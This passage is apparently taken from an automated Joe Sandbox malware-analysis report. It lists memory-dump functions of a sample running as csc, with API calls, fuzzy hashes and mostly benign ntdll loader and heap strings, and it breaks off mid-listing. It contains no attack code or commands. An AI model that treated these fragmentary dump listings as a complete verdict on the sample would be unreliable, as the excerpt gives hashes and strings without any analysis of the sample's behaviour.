Source File: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_csc.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA

Function 0041A7C2 Relevance: 1.5, APIs: 1, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800

Memory Dump Source

Source File: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_csc.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 68a7fb53f19db8fc4b0122ea7caf60be0d3c4a228c37affc46d7d3906d4fc120
Instruction ID: 23f3b5c59c3bf1b946c484d1dd1b09d9bbd519211ec81ee406c7880a26dda3c9
Opcode Fuzzy Hash: 68a7fb53f19db8fc4b0122ea7caf60be0d3c4a228c37affc46d7d3906d4fc120
Instruction Fuzzy Hash: 4CF022B62002086BDB10DFA9DC80EE73369EF89720F04864AFD1C47281C534E8158BB0

Function 0041A670 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D

Memory Dump Source

Source File: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_csc.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0

Function 0041A7D0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800

Memory Dump Source

Source File: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_csc.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5

Function 0041A6B0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8

Memory Dump Source

Source File: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_csc.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1

Function 05602C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05602C24

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 15c5516ea98bc023f0bd0ba1c1d8eb524569b80adc6e976db5517161ce5c0a93
Instruction ID: d25f67d17f4d2aae61594c6ad7351f4be0641aa301a75272a093f55cd9c6479d
Opcode Fuzzy Hash: 15c5516ea98bc023f0bd0ba1c1d8eb524569b80adc6e976db5517161ce5c0a93
Instruction Fuzzy Hash: D3B09B729415C5C6DA55E760460CB2779117BD1711F59C065D20307D5F4738C1D1E275

Non-executed Functions

Function 055F8620 Relevance: 19.0, Strings: 15, Instructions: 223COMMON

Download Yara Rule

Strings

Invalid debug info address of this critical section, xrefs: 056354B6
Critical section debug info address, xrefs: 0563541F, 0563552E
corrupted critical section, xrefs: 056354C2
double initialized or corrupted critical section, xrefs: 05635508
Thread is in a state in which it cannot own a critical section, xrefs: 05635543
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 056354CE
Address of the debug info found in the active list., xrefs: 056354AE, 056354FA
Thread identifier, xrefs: 0563553A
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0563540A, 05635496, 05635519
Critical section address, xrefs: 05635425, 056354BC, 05635534
ICw(JCw@4Cw@4Cw, xrefs: 05635341, 0563534D
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 056354E2
8, xrefs: 056352E3
Critical section address., xrefs: 05635502
undeleted critical section in freed memory, xrefs: 0563542B

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory$ICw(JCw@4Cw@4Cw
API String ID: 0-3651113152
Opcode ID: 6a7cf23c4c19d74894167def7b8c21bde8642152167c27efa4684a6e653a5591
Instruction ID: 44f8bc8b3a108c5e2451652e6100c1b1ff323853d73bc7bda5ea1cf62bf04240
Opcode Fuzzy Hash: 6a7cf23c4c19d74894167def7b8c21bde8642152167c27efa4684a6e653a5591
Instruction Fuzzy Hash: 92816CB1A40358AFEB20CF94CC46FAEBBB6BF58714F10411AF506B7640D3B5A945DB50

Function 05659179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON

Download Yara Rule

Strings

AppContainerNamedObjects, xrefs: 0565946E, 056594D6
%s\%u-%u-%u-%u, xrefs: 05659422
\AppContainerNamedObjects, xrefs: 056594AB, 056594B9
%s\%ld\%s, xrefs: 0565948D
Global\Session\%ld%s, xrefs: 056594C5
BaseNamedObjects, xrefs: 05659477, 0565947C
\BaseNamedObjects, xrefs: 0565949E
\Sessions, xrefs: 05659488

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID: InitializeThunk
String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
API String ID: 2994545307-3063724069
Opcode ID: 35720eb983cc2e57ddabaf1622e90dfc4d918df3f611872c327eb70eba27b7be
Instruction ID: 666a1e6e5125b2c25b8a072a1e2a12f87bc6f82bc3b8544d16ef608ac75ba0a0
Opcode Fuzzy Hash: 35720eb983cc2e57ddabaf1622e90dfc4d918df3f611872c327eb70eba27b7be
Instruction Fuzzy Hash: 5ED1D1B2948711EBD722DA54C884B6FB7E9BF84724F000A2DFE8497250E770DD48CB92

Function 055BF172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 0561DF64, 0561E0A8, 0561E286, 0561E39E
(UCRBlock != NULL), xrefs: 0561DF6F
(LONG)FreeEntry->Size > 1, xrefs: 0561E291
(!TrailingUCR), xrefs: 0561E3A9
HEAP[%wZ]: , xrefs: 0561DF57, 0561E09B, 0561E279, 0561E391
((LONG)FreeEntry->Size > 1), xrefs: 0561E0B3

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 0-523794902
Opcode ID: fd783b0aa8d418af92327ac357b8db7038dd800a8a087b406abeac0819d625aa
Instruction ID: 009c3ae00d54d170a64df3a875d5f90849345fa596dc4ae173b20e98cfb1aba9
Opcode Fuzzy Hash: fd783b0aa8d418af92327ac357b8db7038dd800a8a087b406abeac0819d625aa
Instruction Fuzzy Hash: CF42F2312087829FE715DF28C888BBABBE6FF84304F08496DE8868B751D774D941CB56

Function 0566F525 Relevance: 7.7, Strings: 6, Instructions: 231COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 0566F6F4, 0566F7A1, 0566F7F8
RtlAllocateHeap, xrefs: 0566F56D
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 0566F809
Just allocated block at %p for %Ix bytes, xrefs: 0566F708
HEAP[%wZ]: , xrefs: 0566F6E7, 0566F794, 0566F7EB
Just allocated block at %p for 0x%Ix bytes with tag %ws, xrefs: 0566F7BE

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
API String ID: 0-1745908468
Opcode ID: 5b1ab5f784005c97499be572b91ec89ead3f9ae0249ff3b6a3618ef98ece1ebf
Instruction ID: 592829d374390104d479087c2021239d04f87edbb39837f9b9e52adbf2080baa
Opcode Fuzzy Hash: 5b1ab5f784005c97499be572b91ec89ead3f9ae0249ff3b6a3618ef98ece1ebf
Instruction Fuzzy Hash: F4913231A00645DFEB12DFA8E445AADFBF2FF49710F14805DE446AB761CBB59881CB14

Function 055B645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

Loading the shim user DLL failed with status 0x%08lx, xrefs: 05619A2A
Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 056199ED
Getting the shim user exports failed with status 0x%08lx, xrefs: 05619A01
minkernel\ntdll\ldrinit.c, xrefs: 05619A11, 05619A3A
apphelp.dll, xrefs: 055B6496
LdrpInitShimEngine, xrefs: 056199F4, 05619A07, 05619A30

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: cd8c722e87f47527e4978c0be4b3e06f6298e7f2f743c6623642d97b29a4801a
Instruction ID: ae8c03b570542ef7d79747587265a06989d7a639c2cbcd989d880c16bfe70f2f
Opcode Fuzzy Hash: cd8c722e87f47527e4978c0be4b3e06f6298e7f2f743c6623642d97b29a4801a
Instruction Fuzzy Hash: 5C51F4713183049FE324DF24C85AFAB77E9FB84744F440919F9869B290DE70E944CB96

Function 055F2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0563219F
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 05632178
SXS: %s() passed the empty activation context, xrefs: 05632165
RtlGetAssemblyStorageRoot, xrefs: 05632160, 0563219A, 056321BA
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 056321BF
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 05632180

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: ed0236318d4dec2cf0578a6c488c7201a0be15d4f0d0646b8519bca7ecc7fbab
Instruction ID: 121f576ee651134f4597485179cb0d0440cb357e3318c0a40b90881153dfa442
Opcode Fuzzy Hash: ed0236318d4dec2cf0578a6c488c7201a0be15d4f0d0646b8519bca7ecc7fbab
Instruction Fuzzy Hash: 3E31267AF41225BBE721CA95CC96F6FB779FB98A40F050059FB05A7240D670AE01DBE0

Function 055FC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

LdrpInitializeProcess, xrefs: 055FC6C4
minkernel\ntdll\ldrredirect.c, xrefs: 05638181, 056381F5
LdrpInitializeImportRedirection, xrefs: 05638177, 056381EB
Unable to build import redirection Table, Status = 0x%x, xrefs: 056381E5
Loading import redirection DLL: '%wZ', xrefs: 05638170
minkernel\ntdll\ldrinit.c, xrefs: 055FC6C3

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: 3da811a9d870fc49ce95dab9747fff38603ff265138ade3070506830edd85b88
Instruction ID: 4d18c9f1a8f020e3344f80f0d4c673709d3a9953a5d7a863ffa7d0bfbf5a897e
Opcode Fuzzy Hash: 3da811a9d870fc49ce95dab9747fff38603ff265138ade3070506830edd85b88
Instruction Fuzzy Hash: 6A31E4717587069BD314EB28D94AE2A7795FF88B14F05092CF9456B391DA30DC04C7A2

Function 055EF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 0563031E
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 056302BD
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 056302E7

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 3ccf7a8cf83c46dd6a4fa088164b2985e4711b06a596281b9e53139d45df9478
Instruction ID: 72eb1e44a63ce14efe3094dd830dbe8afa002c0a767e6c6bbd4b3ef3d3769978
Opcode Fuzzy Hash: 3ccf7a8cf83c46dd6a4fa088164b2985e4711b06a596281b9e53139d45df9478
Instruction Fuzzy Hash: 25E1C1706087419FD728CF28C889B2AB7E1BF85324F140A5DF4968B7D1DB74E845CB82

Function 055ED7B0 Relevance: 6.4, Strings: 5, Instructions: 151COMMON

Download Yara Rule

Strings

$, xrefs: 055ED900
Process 0x%p (%wZ) exiting, xrefs: 0562F2C7
LdrShutdownProcess, xrefs: 0562F2CE
minkernel\ntdll\ldrinit.c, xrefs: 0562F2D8
$, xrefs: 055ED86D

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
API String ID: 0-1975516107
Opcode ID: 04d588843cbe4f342a6845ac3735e2b1d478719440142ab4f499594b46c5c010
Instruction ID: e95a8b9f90d3eec4dbd1113d0afea20afd7e5c4b124677b234e54cc4cacd52bd
Opcode Fuzzy Hash: 04d588843cbe4f342a6845ac3735e2b1d478719440142ab4f499594b46c5c010
Instruction Fuzzy Hash: C451D172E083499FDB28DFA4D4857ADBFB2BF48314F14555DD8026B281DB71A981CB90

Function 055B76B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON

Download Yara Rule

Strings

Invalid heap signature for heap at %p, xrefs: 0561B02F
RtlFreeHeap, xrefs: 0561B03F
HEAP: , xrefs: 0561B023
HEAP[%wZ]: , xrefs: 0561B016
, passed to %s, xrefs: 0561B040

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
API String ID: 0-3061284088
Opcode ID: c5b30ee42303030ffc6760b31396e75ddd326ac8d083e2141c4218b6e1db8ffc
Instruction ID: cae50fa7de8562db067d5a55791a2228c3610cae42e6cfe3a42d2cb8fc5a3fbe
Opcode Fuzzy Hash: c5b30ee42303030ffc6760b31396e75ddd326ac8d083e2141c4218b6e1db8ffc
Instruction Fuzzy Hash: 3B01D836229245DFF7299729940EFB2B7D4FF86A31F18405AE40147A61CBF89884D164

Function 055F8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

LdrpInitializeProcess, xrefs: 055F8422
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 055F855E
@, xrefs: 055F8591
minkernel\ntdll\ldrinit.c, xrefs: 055F8421

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: 955097509a8f08aac1ac8dcd5b991c8e3ac736b22d903725bd47440de3e28306
Instruction ID: 1b13cade7d67dc36d6fef384d6a79209683c70545c3fbf938f1f53eafc73887f
Opcode Fuzzy Hash: 955097509a8f08aac1ac8dcd5b991c8e3ac736b22d903725bd47440de3e28306
Instruction Fuzzy Hash: 42917C71608745AFDB21EF60CC59EABBBE8FF88744F40092EFA8592150E734D944CB66

Function 055F273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 056321D9, 056322B1
.Local, xrefs: 055F28D8
SXS: %s() passed the empty activation context, xrefs: 056321DE
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 056322B6

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: 5bd6a1d9018e1e4614e9f75292a41f531a37e2eb48bd3e3aff1f08230efe6218
Instruction ID: 279cab2139ab737c85ed3097af78ed7b8c3e06a05bb8ca7e577a90379cc46aa5
Opcode Fuzzy Hash: 5bd6a1d9018e1e4614e9f75292a41f531a37e2eb48bd3e3aff1f08230efe6218
Instruction Fuzzy Hash: 93A19A79A052299BCB34CF64DD88BA9B3B1BF58314F2545EAD909AB351D7309EC0CF90

Function 055C64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 056210AE
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0562106B
ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 05620FE5
ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 05621028

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: c0ca2274653b2ed9bb924a84f1f7085ab0764cc9bfd450f473d841e391ff1bee
Instruction ID: 975ba9bdd0688357a2dbeb33ad7d8d463a87e93f2a3f4f922714031bbd72c6d4
Opcode Fuzzy Hash: c0ca2274653b2ed9bb924a84f1f7085ab0764cc9bfd450f473d841e391ff1bee
Instruction Fuzzy Hash: A7718C71A083049FCB20DF58C888FA77FA9BB85764F50046CF9498B286D774D688CBD6

Function 055BF626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 0561E54E
`, xrefs: 0561E428
ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0561E563
HEAP[%wZ]: , xrefs: 0561E3FE

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID: InitializeThunk
String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
API String ID: 2994545307-2586055223
Opcode ID: 91afe2d465b94ea4e828715e8b5e28a44f46bcf3845b35636565a950608b7dbd
Instruction ID: 8453b280bb2bf063ea08c80c5a69025fdd553e3bbd10e65771cfcc0076ae18a4
Opcode Fuzzy Hash: 91afe2d465b94ea4e828715e8b5e28a44f46bcf3845b35636565a950608b7dbd
Instruction Fuzzy Hash: 80610032204681AFE721DB68CC48FB7BBE9FF80710F080968ED558B291D774D940CB66

Function 055E15F4 Relevance: 5.2, Strings: 4, Instructions: 166COMMON

Download Yara Rule

Strings

LdrpCompleteMapModule, xrefs: 0562A590
